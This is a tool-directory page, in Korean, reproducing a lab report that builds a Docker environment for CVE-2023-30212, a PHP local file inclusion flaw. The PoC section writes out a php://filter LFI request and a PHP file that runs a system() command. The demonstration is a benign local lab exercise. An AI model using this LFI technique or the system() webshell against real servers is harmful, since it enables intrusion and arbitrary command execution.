Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
cve-2023-30212 — PoC for CVE-2023-30212 using Docker | Kitploit
도구/GitHubGitHub/sungmin20/cve-2023-30212
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubsungmin20/cve-2023-30212

cve-2023-30212

PoC for CVE-2023-30212 using Docker

저장소 보기
1년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

cve-2023-30212

PoC for CVE-2023-30212 using Docker

CVE-2023-30212 환경 구축 및 PoC 보고서

📌 개요

이 보고서는 Vulhub에 없는 CVE-2023-30212 취약점을 대상으로 Docker 기반의 취약한 웹 환경을 직접 구성하고, PoC를 통해 해당 취약점을 입증한 내용을 담고 있습니다.

  • CVE 번호: CVE-2023-30212
  • 취약점 설명: PHP LFI(Local File Inclusion)을 통한 원격 코드 실행 가능성
  • 난이도: 고급 (Vulhub에 없는 환경을 구성)

🔧 환경 구성

1. Dockerfile 및 docker-compose 구성

  • Base image: php:8.1-apache
  • /var/www/html 디렉터리에 vulnerable.php와 malicious.php 복사
  • 8088 포트로 외부 접속 가능 도커빌드

2. 주요 파일 설명

파일명설명
vulnerable.phpLFI 취약점이 존재하는 PHP 파일
malicious.php시스템 명령을 실행하는 악성 PHP 파일
docker-compose.yml
image image image image ---

🚀 취약점 실행 흐름 (PoC)

1. 컨테이너 실행

root@kitploit:~
docker-compose up -d

컨테이너 이름: cve-2023-30212-cve-lfi-1

Apache 서버가 실행되며 http://localhost:8088에서 접속 가능

  1. LFI 기반 악성 파일 소스 확인 아래 URL을 호출하여 malicious.php의 내용을 base64로 인코딩된 형태로 확인합니다:
root@kitploit:~
http://localhost:8088/vulnerable.php?file=php://filter/convert.base64-encode/resource=malicious.php
base64

출력 결과를 디코딩하면 아래 PHP 코드가 확인됩니다:

root@kitploit:~
<?php system("touch /tmp/pwned"); ?>
image
  1. 명령어 실행 및 결과 확인 아래 URL을 호출하여 실제로 명령어를 실행합니다:
root@kitploit:~
http://localhost:8088/malicious.php

명령어 실행 후, /tmp/pwned 파일이 생성되어야 합니다.

root@kitploit:~
docker exec -it cve-2023-30212-cve-lfi-1 ls /tmp

결과에 pwned 파일이 존재하면 성공입니다.

pwned파일

결과 요약

php://filter 기반 LFI 취약점을 통해 악성 파일 내용 확인 및 디코딩 성공

system() 함수가 포함된 악성 PHP 호출을 통해 임의 명령어 실행 성공

/tmp/pwned 파일이 생성됨으로써 PoC 검증 완료

도구 다운로드
컨테이너 구성을 위한 설정 파일
Dockerfile도커 이미지 생성을 위한 설정 파일